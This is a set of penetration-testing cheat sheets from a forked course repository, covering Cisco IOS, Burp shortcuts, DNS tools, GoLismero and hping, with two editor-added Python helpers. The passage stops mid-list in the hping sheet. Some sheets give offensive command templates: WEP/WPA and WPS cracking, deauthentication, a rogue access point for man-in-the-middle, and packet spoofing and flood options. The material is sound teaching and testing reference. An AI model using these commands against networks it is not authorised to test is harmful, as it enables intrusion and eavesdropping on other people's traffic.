├── Cisco-iOS
├── README.md
├── aircrack-ng
├── airport
├── burp
├── cewl
├── cidr
├── cookies
├── dig
├── fierce
├── ftp
├── golismero
├── hping
├── http
├── https-ssl-tls
├── hydra
├── john
├── maltego
├── markdown
├── medusa
├── metasploit
├── meterpreter
├── msfvenom
├── mysql
├── ncat
├── nessus
├── netcat
├── nikto
├── nmap
├── nping
├── permissions
├── php
├── pivoting
├── ps
├── python
├── reverse-shell
├── ruby
├── shadow
├── shodan
├── sqlmap
├── tcpdump
├── tshark
├── volatility
├── webservervulns
├── wireless-encryptions
├── wireshark
└── wpHardening

--------------------------------------------------------------------------------
/Cisco-iOS:
--------------------------------------------------------------------------------
#Cisco IOS - Commands
#Jose Moruno Cadima

#Enter privileged EXEC (enable) mode
enable

#Short for "configure terminal": enter global configuration mode
conf t

#Select interface FastEthernet 0/0
(config)# interface fa0/0

#Assign an IP address and subnet mask to fa0/0
(config-if)# ip address <ip-address> <subnet-mask>

#Configure the vty (remote login) lines
(config)# line vty 0 4

#Require a password at login on the vty lines
(config-line)# login

#Set the vty (telnet) line password
(config-line)# password YOUR-PASSWORD
#Caveat: telnet carries this password in cleartext and "login" uses one shared line password.
#Prefer SSH: "ip domain-name", "crypto key generate rsa", a local user ("username <name> secret <pw>"),
#then on the vty lines "login local" and "transport input ssh"; "service password-encryption" hides line passwords in the config.

#Show running config loaded in memory
# show running-config

#Show startup config
# show startup-config

#Show Cisco IOS version
# show version

#Display open sessions
# show sessions

#Show network interfaces
# show ip interface

#Show detailed interface info
# show interface e0

#Show routes
# show ip route

#Show access lists
# show access-lists

#Show available file systems
# show file systems

#List files on all file systems
# dir all-filesystems

#Show deleted files (flash)
# dir /all

#No paging of terminal output
# terminal length 0

#Copy the running config to a TFTP server
# copy running-config tftp

#Save the running config as the startup config
# copy running-config startup-config

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
NOTE
====

[andrewjkerr](https://github.com/andrewjkerr/security-cheatsheets) repository forked for
[www.sniferl4bs.com](http://www.sniferl4bs.com)

The fork was made because the original author has not updated it in about two years.

Security Cheatsheets
====================

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to help penetration testers, CTF participants and security enthusiasts remember commands that are useful but not frequently used. Most of the tools covered have been included in our class and are available in [Kali Linux](http://www.kali.org).

Requirements
------------

The only requirement to use these cheatsheets is for [cheat](https://github.com/chrisallenlane/cheat) to be installed.

How to Use
----------

In order to use these cheatsheets, the cheatsheets in this repository need to go into the `~/.cheat/` directory. After the files are moved into that directory, `cheat ncat` will display the ncat cheatsheet.
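The vty block in the Cisco-iOS sheet above (`login` plus a shared line `password`, reachable over telnet) is exactly the pattern an auditor looks for in a saved `show running-config`. The Python below is an added example, not code from this cheatsheet repository or from Cisco: both config texts are constructed samples, and the list of checks (SSH-only transport, `login local`, `enable secret`, `service password-encryption`, `access-class`, `exec-timeout`) is the editor's selection, not a complete hardening baseline.

```python
"""Audit a saved `show running-config` for weak remote-access settings.

Added example for the Cisco-iOS sheet; not code from the cheatsheet repository
or from Cisco. Both configs below are constructed samples.
"""
import re

# Constructed sample: the vty block exactly as the sheet builds it (shared line
# password, telnet allowed), plus a cleartext enable password.
WEAK_CONFIG = """\
!
no service password-encryption
!
enable password cisco123
!
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
line vty 0 4
 password YOUR-PASSWORD
 login
 transport input all
!
"""

# Constructed sample of the hardened equivalent: SSH only, per-user hashed
# secrets, management ACL and idle timeout (the hash strings are dummies).
HARDENED_CONFIG = """\
!
service password-encryption
!
enable secret 5 $1$abcd$AbCdEfGhIjKlMnOpQrStU.
!
username admin privilege 15 secret 5 $1$wxyz$ZyXwVuTsRqPoNmLkJiHgF/
!
ip ssh version 2
!
line vty 0 4
 access-class 10 in
 exec-timeout 10 0
 login local
 transport input ssh
!
"""


def config_blocks(config):
    """Split IOS config text on the '!' separators into (header, body_lines) pairs."""
    blocks, current = [], []
    for raw in config.splitlines():
        line = raw.rstrip()
        if line == "!":
            if current:
                blocks.append((current[0], current[1:]))
            current = []
        elif line.strip():
            current.append(line.strip())
    if current:
        blocks.append((current[0], current[1:]))
    return blocks


def audit_running_config(config):
    """Return a list of findings; an empty list means none of the checks fired."""
    findings = []
    blocks = config_blocks(config)
    # Blocks without sub-commands are global one-liners (service, enable, username ...).
    global_lines = [header for header, body in blocks if not body]

    if "no service password-encryption" in global_lines:
        findings.append("password encryption disabled: line passwords are stored in cleartext")
    if any(re.match(r"enable password\b", line) for line in global_lines):
        findings.append("'enable password' in use: replace with 'enable secret' (hashed)")

    for header, body in blocks:
        if not header.startswith("line vty"):
            continue
        transport = next((line for line in body if line.startswith("transport input")), None)
        if transport is None:
            findings.append(f"{header}: no 'transport input' set; restrict to 'transport input ssh'")
        elif transport.split()[2:] != ["ssh"]:
            findings.append(f"{header}: '{transport}' permits cleartext telnet; use 'transport input ssh'")
        if "login local" not in body:
            findings.append(f"{header}: shared line password (or no auth); use 'login local' with per-user secrets")
        if not any(line.startswith("access-class") for line in body):
            findings.append(f"{header}: no access-class; management sources are unrestricted")
        if not any(line.startswith("exec-timeout") for line in body):
            findings.append(f"{header}: no exec-timeout; idle sessions never expire")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_running_config(cfg)
        print(f"[{name}] {len(result)} finding(s)")
        for finding in result:
            print("  -", finding)
```

Feed it the text of `show running-config` (for example captured with `terminal length 0` so nothing is paged away); the weak sample produces six findings and the hardened one none.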
Contributors
============

Jose Moruno Cadima aka Snifer [TWITTER](https://twitter.com/sniferl4bs) [BLOG](http://www.sniferl4bs.com)

Jason Soto aka Jsitech [TWITTER](https://twitter.com/Jsitech) [BLOG](http://www.jsitech.com)

GUTEM - [GITHUB](https://github.com/Gutem)

Original Contributors
=====================

Andrew Kerr (andrewjkerr)

Angela Evans (angelaevans)

Alex Bujduveanu (alexbujduveanu)

Michael Christakos (truckiewow)

Resources
=========

Metasploit Cheat Sheet [SANS Institute](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)

Volatility Cheat Sheet [SANS Institute](https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf)

Cisco IOS Cheat Sheet [highon.coffee](https://highon.coffee)

--------------------------------------------------------------------------------
/aircrack-ng:
--------------------------------------------------------------------------------
#Wifi Cheat Sheet - aircrack-ng
# michael
#Jose Moruno Cadima
#Uceka CheatSheet

#Start monitor mode and save captures
iw dev wlan0 add interface mon0 type monitor
airmon-ng start wlan0
airodump-ng -c <channel> --bssid <bssid> -w <capture prefix> <monitor interface>

# To crack WEP for a given essid name and store the key into a file
aircrack-ng -a 1 -e <essid> -l <keyfile> <.cap or .ivs file(s)>

# To crack WPA/WPA2 from an airolib-ng database
aircrack-ng -e <essid> -r <airolib-ng database> <.cap or .ivs file(s)>

# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>

# To crack a given bssid
aircrack-ng -b <bssid> -l <keyfile> <.cap or .ivs file(s)>

# To crack a given bssid using the FMS/KoreK method
aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>

# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s <.cap or .ivs file(s)>

# To crack a given essid (WEP) and create an EWSA project
aircrack-ng -e <essid> -E <EWSA project file> <.cap or .ivs file(s)>

#Attack WPS with Reaver
wash -i wlan0mon -C
reaver -i wlan0mon -b <bssid> -vv -S
#or, a specific attack (known channel and PIN)
reaver -i <interface> -c <channel> -b <bssid> -p <pin> -vv -S

#Find a hidden SSID (deauth a client and read the SSID from its reassociation)
airmon-ng start wlan0
airodump-ng -c <channel> --bssid <bssid> wlan0mon
aireplay-ng -0 20 -a <bssid> -c <client mac> wlan0mon

#Man in the Middle Attack (rogue AP bridged to the wired network)
airmon-ng start wlan0
airbase-ng -e "<essid>" wlan0mon
brctl addbr <bridge>
brctl addif <bridge> eth0
brctl addif <bridge> at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig <bridge> up
aireplay-ng --deauth 0 -a <bssid> wlan0mon
dhclient <bridge> &
wireshark & select interface

--------------------------------------------------------------------------------
/airport:
--------------------------------------------------------------------------------
# Gutem
# OSX's airport commands to scan & sniff wireless networks

# Create an alias. Don't forget to source your .bashrc after this
echo 'alias airport="/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport"' >> ~/.bashrc

# Or you can create a symbolic link
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

# Scanning the networks
# INTERFACE is optional if you only have one wireless interface
# You can use '| grep WEP' to show only WEP networks or '| grep WPS' to show only WPS-enabled networks
airport (INTERFACE) scan

# Sniffing on a channel
airport (INTERFACE) sniff CHANNEL

# File generated
/tmp/airportSniffXXXXXX.cap

# Checking the file's size
du -hs /tmp/*.cap

# Cracking with aircrack-ng.
# Attack mode: 1/WEP, 2/WPA-PSK
aircrack-ng -a 1 -b $BSSID $CAP_FILE

--------------------------------------------------------------------------------
/burp:
--------------------------------------------------------------------------------
# Burp Cheat Sheet
# A cheat sheet for the PortSwigger Burp Suite application security testing framework.
# Original: https://github.com/mccabe615/BurpCheatSheet

# Global

# Send to Repeater
Ctrl+R

# Send to Intruder
Ctrl+I

# Forward intercepted Proxy message
Ctrl+F

# Toggle Proxy interception
Ctrl+T

# Switch to Target
Ctrl+Shift+T

# Switch to Proxy
Ctrl+Shift+P

# Switch to Scanner
Ctrl+Shift+S

# Switch to Intruder
Ctrl+Shift+I

# Switch to Repeater
Ctrl+Shift+R

# Switch to Suite options
Ctrl+Shift+O

# Switch to Alerts tab
Ctrl+Shift+A

# Go to previous tab
Ctrl+Minus

# Go to next tab
Ctrl+Equals

# Editor

# Cut
Ctrl+X

# Copy
Ctrl+C

# Paste
Ctrl+V

# Undo
Ctrl+Z

# Redo
Ctrl+Y

# Select all
Ctrl+A

# Search
Ctrl+S

# Go to previous search match
Ctrl+Comma

# Go to next search match
Ctrl+Period

# URL-decode
Ctrl+Shift+U

# URL-encode key characters
Ctrl+U

# HTML-decode
Ctrl+Shift+H

# HTML-encode key characters
Ctrl+H

# Base64-decode
Ctrl+Shift+B

# Base64-encode
Ctrl+B

# Backspace word
Ctrl+Backspace

# Delete word
Ctrl+Delete

# Delete line
Ctrl+D

# Go to previous word
Ctrl+Left

# Go to previous word (extend selection)
Ctrl+Shift+Left

# Go to next word
Ctrl+Right

# Go to next word (extend selection)
Ctrl+Shift+Right

# Go to previous paragraph
Ctrl+Up

# Go to previous paragraph (extend selection)
Ctrl+Shift+Up

# Go to next paragraph
Ctrl+Down

# Go to next paragraph (extend selection)
Ctrl+Shift+Down

# Go to start of document
Ctrl+Home

# Go to start of document (extend selection)
Ctrl+Shift+Home

# Go to end of document
Ctrl+End

# Go to end of document (extend selection)
Ctrl+Shift+End

--------------------------------------------------------------------------------
/cewl:
--------------------------------------------------------------------------------
# To spider a site and write all found words to a file
cewl <url> -w <output file>

# To spider a site and follow links to other sites
cewl <url> -o

# To spider a site using a given user-agent
cewl <url> -u <user-agent>

# To spider a site for a given depth and minimum word length
cewl <url> -d <depth> -m <min word length>

# To spider a site and include a count for each word
cewl <url> -c

# To spider a site including meta data and write the meta data words to a separate file
cewl <url> -a --meta_file <file>

# To spider a site and store email addresses in a separate file
cewl <url> -e --email_file <file>

--------------------------------------------------------------------------------
/cidr:
--------------------------------------------------------------------------------
# alex

# Classless Inter-Domain Routing

# Before CIDR and Variable Length Subnet Masks, IP addresses had fixed subnet masks
# Class C had a 24 bit prefix (/24), Class B had a 16 bit prefix (/16), and Class A had an 8 bit prefix (/8)

# Note: The prefix determines how many addresses are covered by the CIDR address.
# The prefix is the number of bits reserved for the network portion of the address

# An IP address consists of a host and a network portion
# The 32 bit string below represents a /16 network since 16 bits are dedicated to the network portion of the address
# Network bits / Host bits
11111111 11111111 / 00000000 00000000

# As an example, if we were to make a subnet with only 2 addresses on the 3.3.3.0 network, the network prefix would be /31
# If we view this in binary it would look like:
00000011.00000011.00000011.00000000 (3.3.3.0)

# The subnet mask then becomes
11111111.11111111.11111111.11111110 (/31)

# In the subnet mask above, only one bit is available for modification, so the only two available IP addresses would be:
3.3.3.0 and 3.3.3.1
# (a /31 is the RFC 3021 point-to-point case: both addresses are usable and there is no broadcast address)

# 3.3.3.2 would represent the start of another subnet

# If we changed the prefix to /30, the new IP address range would be
3.3.3.0 - 3.3.3.3
# (3.3.3.0 is the network address and 3.3.3.3 the broadcast, so only 3.3.3.1 and 3.3.3.2 are usable hosts)

--------------------------------------------------------------------------------
/cookies:
--------------------------------------------------------------------------------
# andrew
# javascript
document.cookie; # can pair with alert(); only cookies set without the HttpOnly flag are visible here

# edit cookies in chrome
Settings -> Advanced Settings -> Privacy -> Content -> Cookies
or "Edit This Cookie" plugin

# edit cookies in firefox
Preferences -> Privacy -> Show Cookies
or "Cookies Manager+" addon

# cookies with ruby
# Use the HTTP::Cookie library (http-cookie gem)
# Following examples were taken from the README of that repository
require 'http/cookie'

## Several cookies
jar = HTTP::CookieJar.new
jar.load(filename) if File.exist?(filename)
header["Set-Cookie"].each { |value| jar.parse(value, uri) }
header["Cookie"] = HTTP::Cookie.cookie_value(jar.cookies(uri))

## One cookie
cookie = HTTP::Cookie.new("uid", "u12345", domain: 'example.org',
                                           for_domain: true,
                                           path: '/',
                                           max_age: 7 * 86400)
header['Set-Cookie'] = cookie.set_cookie_value

# cookies with python
# python has a cookie library!
# Following example is adapted from the python documentation (Python 3 module names; Python 2 used cookielib and urllib2)
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://example.com/")

--------------------------------------------------------------------------------
/dig:
--------------------------------------------------------------------------------
#To run dig (domain information groper)
dig [domain]

#To just get the ip address
dig [domain] +nocomments +noauthority +noadditional +nostats
OR
dig [domain] +noall +answer
OR
dig [domain] +short

#To use a specific query type
dig -t [query type] [domain] [options]
OR
dig [domain] [query type] [options]

#To view ALL DNS record types use query ANY (many resolvers now refuse or minimise ANY answers, see RFC 8482)
dig -t ANY [domain] [options]
OR
dig [domain] ANY [options]

#To do a DNS reverse look up
dig -x [ip address] +short

#To use a specific DNS server
dig @[specific DNS] [domain]

#To do a bulk DNS query (where file.txt has all the domains, one to a line)
dig [domain1] [options] [domain2] [options]
OR
dig -f file.txt [options]

--------------------------------------------------------------------------------
/fierce:
--------------------------------------------------------------------------------
# To scan a domain and output to a file
fierce -dns <domain> -file <output file>

# To scan a domain and specify which DNS server to use
fierce -dns <domain> -dnsserver <server>

# To scan an internal ip range for a given server
fierce -range <ip range> -dnsserver <server>

# To scan a domain using a given wordlist
fierce -dns <domain> -wordlist <wordlist>

# To scan a domain using a specified timeout and number of ip addresses to branch from all found addresses
fierce -dns <domain> -tcptimeout <# seconds> -traverse <# addresses>

# To scan domains from a list and search the entire class C for each found address
fierce -dnsfile <file> -wide

--------------------------------------------------------------------------------
/ftp:
--------------------------------------------------------------------------------
#ftp client commands
binary  - set binary transfer type
cd      - change remote working directory
lcd     - change local working directory
get     - receive file
mget    - get multiple files
passive - enter passive transfer mode
ls      - list contents of remote directory

#Traditional ports, though they can be dynamically assigned
Port 21 - control commands
Port 20 - data transfer

#Active mode
The client opens the control session to port 21 and announces (PORT command) which client port the server should connect back to; the server then initiates the data connection from its port 20 to that client port.
***If the client is behind a firewall or NAT, the server might not be able to connect back to send data.

#Passive mode
The server gives the client a port (PASV reply) to initiate the data connection to.
***Most commonly used by browsers, etc.
***Either way, FTP sends credentials and data in cleartext; prefer SFTP or FTPS.

--------------------------------------------------------------------------------
/golismero:
--------------------------------------------------------------------------------
#Golismero Cheat Sheet
#Jason Soto

#GoLismero is an open source framework for security testing. It's currently geared towards web security

#Syntax

golismero.py [-h] [--help] [-f FILE] [--config FILE] [--user-config FILE] [-p NAME] [--ui-mode MODE] [-v] [-q] [--color]
             [--no-color] [--audit-name NAME] [-db DATABASE] [-nd] [-i FILENAME] [-ni] [-o FILENAME] [-no] [--full] [--brief]
             [--allow-subdomains] [--forbid-subdomains] [--parent] [-np] [-r DEPTH] [--follow-redirects] [--no-follow-redirects]
             [--follow-first] [--no-follow-first] [--max-connections MAX_CONNECTIONS] [-l MAX_LINKS] [-pu USER] [-pp PASS]
             [-pa ADDRESS] [-pn PORT] [--cookie COOKIE] [--user-agent USER_AGENT] [--cookie-file FILE] [--persistent-cache]
             [--volatile-cache] [-a PLUGIN:KEY=VALUE] [-e PLUGIN] [-d PLUGIN] [--max-concurrent N] [--plugin-timeout N]
             [--plugins-folder PATH]
             COMMAND [TARGET [TARGET ...]]

#available commands

SCAN:
    Perform a vulnerability scan on the given targets. Optionally import
    results from other tools and write a report. The arguments that follow may
    be domain names, IP addresses or web pages.

RESCAN:
    Same as SCAN, but previously run tests are repeated. If the database is
    new, this command is identical to SCAN.

PROFILES:
    Show a list of available config profiles. This command takes no arguments.

PLUGINS:
    Show a list of available plugins. This command takes no arguments.

INFO:
    Show detailed information on a given plugin. The arguments that follow are
    the plugin IDs. You can use glob-style wildcards.

REPORT:
    Write a report from an earlier scan. This command takes no arguments.
    To specify output files use the -o switch.

IMPORT:
    Import results from other tools and optionally write a report, but don't
    scan the targets. This command takes no arguments. To specify input files
    use the -i switch.

DUMP:
    Dump the database from an earlier scan in SQL format. This command takes no
    arguments. To specify output files use the -o switch.

LOAD:
    Load a database dump from an earlier scan in SQL format. This command takes
    no arguments. To specify input files use the -i switch.

UPDATE:
    Update GoLismero to the latest version. Requires Git to be installed and
    available in the PATH. This command takes no arguments.

#positional arguments
COMMAND               action to perform
TARGET                zero or more arguments, meaning depends on command

#optional arguments
-h                    show this help message and exit
--help                show this help message and exit

#main options
-f FILE, --file FILE  load a list of targets from a plain text file
--config FILE         global configuration file
--user-config FILE    per-user configuration file
-p NAME, --profile NAME
                      profile to use
--ui-mode MODE        UI mode
-v, --verbose         increase output verbosity
-q, --quiet           suppress text output
--color               use colors in console output
--no-color            suppress colors in console output

#audit options
--audit-name NAME     customize the audit name
-db DATABASE, --audit-db DATABASE
                      specify a database filename
-nd, --no-db          do not store the results in a database
-i FILENAME, --input FILENAME
                      read results from external tools right before the audit
-ni, --no-input       do not read results from external tools

#report options
-o FILENAME, --output FILENAME
                      write the results of the audit to this file (use - for stdout)
-no, --no-output      do not output the results
--full                produce fully detailed reports
--brief               report only the highlights

#network options
--allow-subdomains    include subdomains in the target scope
--forbid-subdomains   do not include subdomains in the target scope
--parent              include parent folders in the target scope
-np, --no-parent      do not include parent folders in the target scope
-r DEPTH, --depth DEPTH
                      maximum spidering depth (use "infinite" for no limit)
--follow-redirects    follow redirects
--no-follow-redirects
                      do not follow redirects
--follow-first        always follow a redirection on the target URL itself
--no-follow-first     don't treat a redirection on a target URL as a special case
--max-connections MAX_CONNECTIONS
                      maximum number of concurrent connections per host
-l MAX_LINKS, --max-links MAX_LINKS
                      maximum number of links to analyze (0 => infinite)
-pu USER, --proxy-user USER
                      HTTP proxy username
-pp PASS, --proxy-pass PASS
                      HTTP proxy password
-pa ADDRESS, --proxy-addr ADDRESS
                      HTTP proxy address
-pn PORT, --proxy-port PORT
                      HTTP proxy port number
--cookie COOKIE       set cookie for requests
--user-agent USER_AGENT
                      set a custom user agent or 'random' value
--cookie-file FILE    load a cookie from file
--persistent-cache    use a persistent network cache [default]
--volatile-cache      use a volatile network cache

#plugin options
-a PLUGIN:KEY=VALUE, --plugin-arg PLUGIN:KEY=VALUE
                      pass an argument to a plugin
-e PLUGIN, --enable-plugin PLUGIN
                      enable a plugin
-d PLUGIN, --disable-plugin PLUGIN
                      disable a plugin
--max-concurrent N    maximum number of plugins to run concurrently
--plugin-timeout N    timeout in seconds for the execution of a plugin
--plugins-folder PATH
                      customize the location of the plugins

#Example
#Show available plugins
$ ./golismero.py plugins

#Available Plugins
#Import plugins

csv_nikto:
    Import the results of a Nikto scan in CSV format.

csv_spiderfoot:
    Import the results of a SpiderFoot scan in CSV format.

xml_nmap:
    Import the results of an Nmap scan in XML format.
xml_openvas:
    Import the results of an OpenVAS scan in XML format.

xml_sslscan:
    Import the results of an SSLScan run in XML format.

#Recon plugins

dns:
    DNS resolver plugin.
    Without it, GoLismero can't resolve domain names to IP addresses.

dns_malware:
    Detect if a domain has been potentially spoofed or hijacked.

exploitdb:
    Integration with Exploit-DB (http://www.exploit-db.com/)
    This plugin requires a working Internet connection to run.

fingerprint_web:
    Fingerprinter of web servers.

geoip:
    Geolocates IP addresses using online services.
    This plugin requires a working Internet connection to run.

punkspider:
    Integration with PunkSPIDER (http://punkspider.hyperiongray.com/)
    This plugin requires a working Internet connection to run.

robots:
    Analyzes robots.txt files and extracts their links.

shodan:
    Integration with Shodan: http://www.shodanhq.com/
    This plugin requires a working Internet connection to run.

spider:
    Web spider plugin.
    Without it, GoLismero can't crawl web sites.

spiderfoot:
    Integration with SpiderFoot: http://www.spiderfoot.net/

theharvester:
    Integration with theHarvester: https://github.com/MarioVilas/theHarvester/

#Scan plugins

brute_directories:
    Tries to discover hidden folders by brute force:
    www.site.com/folder/ -> www.site.com/folder2 www.site.com/folder3 ...

brute_dns:
    Tries to find hidden subdomains by brute force.

brute_url_extensions:
    Tries to discover hidden files by brute force:
    www.site.com/index.php -> www.site.com/index.php.old

brute_url_permutations:
    Tries to discover hidden files by bruteforcing the extension:
    www.site.com/index.php -> www.site.com/index.php2

brute_url_predictables:
    Tries to discover hidden files at predictable locations.
    For example: (Apache) www.site.com/error_log

brute_url_prefixes:
    Tries to discover hidden files by bruteforcing prefixes:
    www.site.com/index.php -> www.site.com/~index.php

brute_url_suffixes:
    Tries to discover hidden files by bruteforcing suffixes:
    www.site.com/index.php -> www.site.com/index2.php

nikto:
    Integration with Nikto: https://www.cirt.net/nikto2

nmap:
    Integration with Nmap: http://nmap.org/

openvas:
    Integration with OpenVAS: http://www.openvas.org/

plecost:
    WordPress vulnerabilities analyzer, completely rewritten for GoLismero,
    based on the original idea of Plecost (https://code.google.com/p/plecost/)
    and their team: @ffranz and @ggdaniel

sslscan:
    Integration with SSLScan: http://sourceforge.net/projects/sslscan/

zone_transfer:
    Detects and exploits DNS zone transfer vulnerabilities.

#Attack plugins

heartbleed:
    Test for the CVE-2014-0160 vulnerability (aka "heartbleed attack").

sqlmap:
    SQL Injection plugin, using SQLMap.
    Only retrieves the DB banner, does not exploit any vulnerabilities.

xsser:
    Integration with XSSer: http://xsser.sourceforge.net/

#Report plugins

bson:
    BSON (Binary JSON) output for programmatic access.

csv:
    Writes reports in Comma Separated Values format.

html:
    Writes reports as offline web pages.

json:
    JSON output for programmatic access.

latex:
    Writes reports in LaTeX document format (.tex).

log:
    Extracts only the logs.

ltsv:
    Extracts only the logs, in labeled tab-separated values format.

msgpack:
    MessagePack output for programmatic access.
    See: http://msgpack.org/

odt:
    Writes reports in OpenOffice document format (.odt).

rst:
    Writes reports in reStructured Text format.

text:
    Writes plain text reports to a file or on screen.

xml:
    XML output for programmatic access.

yaml:
    YAML output for programmatic access.

#UI plugins

console:
    Console user interface. This is the default.

disabled:
    Empty user interface. Used by some unit tests.

#Examples
#scan a website and show the results on screen:
$ ./golismero.py scan http://www.example.com

#grab Nmap results, scan all hosts found and write an HTML report:
$ ./golismero.py scan -i nmap_output.xml -o report.html

#grab results from OpenVAS and show them on screen, but don't scan anything:
$ ./golismero.py import -i openvas_output.xml

#show information on plugins:
$ ./golismero.py info [plugin_name]
$ ./golismero.py info theharvester
$ ./golismero.py info plecost
$ ./golismero.py info brute*

#Scan using specific plugins
$ ./golismero.py scan [domain] -e [plugin]
$ ./golismero.py scan example.com -e plecost
$ ./golismero.py scan example.com -e plecost -e theharvester

#Scan using multiple plugins with a wildcard
$ ./golismero.py scan example.com -e brute*

#Scanning and generating an HTML report
$ ./golismero.py scan example.com -o example.html

#dump the database from a previous scan:
$ ./golismero.py dump -db example.db -o dump.sql
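The `scan -i nmap_output.xml` example above hands Nmap's XML output to GoLismero's xml_nmap import plugin. As an added illustration of what that import has to do (this is not GoLismero's code), the Python below parses Nmap `-oX` output into open-port records and turns the web services among them into scanner target URLs. The XML is a constructed sample in the shape `nmap -sV -oX out.xml <target>` writes; hosts that are down and ports that are not open are skipped, which is the usual source of surprise when a scan "finds nothing".

```python
"""Parse Nmap XML (-oX) into open-port records, the format `scan -i nmap_output.xml` imports.

Added example, not GoLismero's xml_nmap plugin. SAMPLE_NMAP_XML is a constructed
document in the shape `nmap -sV -oX out.xml <target>` writes.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX out.xml 192.0.2.0/30" version="7.94">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.0.2.1" addrtype="ipv4"/>
    <hostnames><hostname name="www.example.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6" tunnel="ssl"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.2" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port on every host that is up.

    Down hosts and closed/filtered ports are skipped. Elements are compared with
    `is None` on purpose: an ElementTree Element with no children is falsy.
    """
    root = ET.fromstring(xml_text)
    records = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        hn = host.find("hostnames/hostname")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = svc.get if svc is not None else (lambda key: None)
            records.append({
                "addr": addr_el.get("addr") if addr_el is not None else None,
                "hostname": hn.get("name") if hn is not None else None,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": get("name"),
                "product": get("product"),
                "version": get("version"),
                "tunnel": get("tunnel"),     # "ssl" when nmap saw TLS in front of the service
            })
    return records


def web_targets(records):
    """Build scanner target URLs from http/https findings; scheme comes from the service name or tunnel="ssl"."""
    urls = []
    for rec in records:
        if rec["service"] not in ("http", "https"):
            continue
        scheme = "https" if rec["service"] == "https" or rec["tunnel"] == "ssl" else "http"
        urls.append(f"{scheme}://{rec['hostname'] or rec['addr']}:{rec['port']}/")
    return urls


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for rec in found:
        print(f"{rec['addr']} {rec['port']}/{rec['proto']} {rec['service']} {rec['product']} {rec['version']}")
    print(web_targets(found))
```

Replace `SAMPLE_NMAP_XML` with the contents of a real `-oX` file to get the same records; the `tunnel="ssl"` attribute is what distinguishes an HTTPS service from plain HTTP on a non-standard port.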
#Add a Shodan API key to GoLismero
$ mkdir ~/.golismero
$ nano ~/.golismero/user.conf
[shodan:Configuration]
apikey =

--------------------------------------------------------------------------------
/hping:
--------------------------------------------------------------------------------
# Jose Moruno Cadima <@sniferl4bs>
#Source: José A. Guasch, SecurityByDefault

#BASE OPTIONS
-q --quiet                    -v --version
-I --interface                -V --verbose
-D --debug
-c --count        number of packets to send
-i --interval     wait secs between packets, or µsecs with u (e.g. u10000) [1]
--beep            beep for every matching packet received
-n --numeric      don't resolve names
-z --bind         bind ctrl+z to TTL (increment it)
-Z --unbind       unbind ctrl+z
--fast            alias for -i u10000 (10 packets / sec)
--faster          alias for -i u1 (1 packet / µs)
--flood           as fast as possible, replies are not shown

#COMMON OPTIONS
-d --data         datasize: packet body size
-E --file         insert file contents into the packet data
-e --sign         add a signature to the payload
-j --dump         dump received packets in hex
-J --print        dump received packets as printable chars
-B --safe         enable the "safe" protocol (lost packets are resent)
-u --end          report when --file reaches EOF
-T --traceroute   traceroute mode, also:
   --tr-keep-ttl  keep the TTL fixed
   --tr-stop      exit on the first reply that is not ICMP time exceeded
   --tr-no-rtt    don't show RTT
--tcpexitcode     use the TCP flags of the last received packet as exit code

#IP RELATED OPTIONS
-a --spoof        spoof the source address (hostname or ip)
--rand-source     random source address
--rand-dest       random destination address (the host accepts x as wildcard)
-t --ttl          set the TTL value
-N --id           ip id [random]
-H --ipproto      ip protocol field, raw ip mode only
-W --winid        use win* id byte ordering
-r --rel          relativize the id field (show id increments)
-f --frag         split packets into fragments [16 bytes]
-x --morefrag     set the more-fragments flag
-y --dontfrag     set the don't-fragment flag
-g --fragoff      set the fragment offset value
-G --rroute       include the RECORD_ROUTE option
-m --mtu          set a virtual mtu value
-o --tos          set the type of service, in hex

#ICMP RELATED OPTIONS
-C --icmptype     icmp type [echo request]
-K --icmpcode     icmp code [0]
--icmp-ipver      ip version [4]
--icmp-iphlen     ip header length [5]
--icmp-iplen      ip packet length [real len]
--icmp-ipid       set ip id [rand]
--icmp-ipproto    set ip protocol [tcp]
--icmp-cksum      set the icmp checksum [valid]
--icmp-ts         alias for --icmptype 13 (timestamp request)
--icmp-addr       alias for --icmptype 17 (address mask request)

#TCP/UDP RELATED OPTIONS
-s --baseport     base source port [random], +1 for each packet sent
-p --destport     destination port [0]; modifiers:
